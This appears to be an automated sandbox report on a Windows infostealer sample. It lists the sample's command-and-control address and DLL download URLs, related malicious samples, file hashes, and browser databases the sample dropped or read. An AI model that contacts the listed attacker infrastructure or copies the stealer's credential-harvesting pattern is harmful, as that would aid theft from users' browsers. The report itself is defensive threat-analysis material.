                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1913485231.0000000022B61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYmBitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://www.ecosia.org/newtab/JEBFIIIE.1.drfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://147.45.44.221/3538548809da56b2/mozglue.dllXBitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brKEHDBAEGIIIEBGCAAFHIDHDBFB.1.drfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://147.45.44.221/3538548809da56b2/freebl3.dll4BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://ac.ecosia.org/autocomplete?q=JEBFIIIE.1.drfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://ac.ecopnaclBitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://147.45.44.221/28166bd28a5d19e6.phpcBitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgBitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://147.45.44.221/28166bd28a5d19e6.phpareBitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://147.45.44.221/28166bd28a5d19e6.phpWBitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://support.mozilla.orgKEHDBAEGIIIEBGCAAFHIDHDBFB.1.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://ac.ecopBitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=JEBFIIIE.1.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://147.45.44.221/3538548809da56b2/nss3.dllXBitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://147.45.44.221/28166bd28a5d19e6.phpKBitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs
                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            147.45.44.221
                                                                                                            unknownRussian Federation
                                                                                                            2895FREE-NET-ASFREEnetEUtrue
                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                            Analysis ID:1538409
                                                                                                            Start date and time:2024-10-21 08:46:07 +02:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 6m 54s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Number of analysed new started processes analysed:7
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:0
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@3/22@0/1
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 50%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 100%
                                                                                                            • Number of executed functions: 81
                                                                                                            • Number of non-executed functions: 162
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe
                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                            • Execution Graph export aborted for target 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, PID 2140 because there are no executed function
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                            No simulations
                                                                                                            No context
                                                                                                            No context
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            FREE-NET-ASFREEnetEUhttp://heks.egrowbrands.com/yuop/66e9b62daa62d_xin.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 147.45.44.104
                                                                                                            http://hans.uniformeslaamistad.com/malesa/6705347f535f8_install.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 147.45.44.104
                                                                                                            http://heks.egrowbrands.com/lopsa/67057a2256a25_SwiftKey.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 147.45.44.104
                                                                                                            http://lide.omernisar.com/lopsa/66daf6d8ac980_PeakSports.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 147.45.44.104
                                                                                                            01oTkKQVSW.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 147.45.47.185
                                                                                                            01oTkKQVSW.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 147.45.47.185
                                                                                                            G57uwXZLsE.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                            • 147.45.41.134
                                                                                                            Document-19-06-38.jsGet hashmaliciousBruteRatelBrowse
                                                                                                            • 147.45.116.47
                                                                                                            Document-19-06-38.jsGet hashmaliciousBruteRatelBrowse
                                                                                                            • 147.45.116.47
                                                                                                            jYDYjpSbvf.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, LummaC Stealer, RedLine, SmokeLoader, StealcBrowse
                                                                                                            • 147.45.60.44
                                                                                                            No context
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                          L0ad3r.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                C:\ProgramData\mozglue.dllfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                              L0ad3r.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):49152
                                                                                                                                                    Entropy (8bit):0.8180424350137764
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):98304
                                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):114688
                                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):9571
                                                                                                                                                    Entropy (8bit):5.536643647658967
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                    MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                    SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                    SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                    SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):40960
                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):28672
                                                                                                                                                    Entropy (8bit):2.5793180405395284
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):106496
                                                                                                                                                    Entropy (8bit):1.1358696453229276
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):5242880
                                                                                                                                                    Entropy (8bit):0.037963276276857943
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                    MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                    SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                    SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                    SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):685392
                                                                                                                                                    Entropy (8bit):6.872871740790978
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                    MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: L0ad3r.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):608080
                                                                                                                                                    Entropy (8bit):6.833616094889818
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: L0ad3r.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):450024
                                                                                                                                                    Entropy (8bit):6.673992339875127
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2046288
                                                                                                                                                    Entropy (8bit):6.787733948558952
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):257872
                                                                                                                                                    Entropy (8bit):6.727482641240852
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                    MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                    Malicious:false
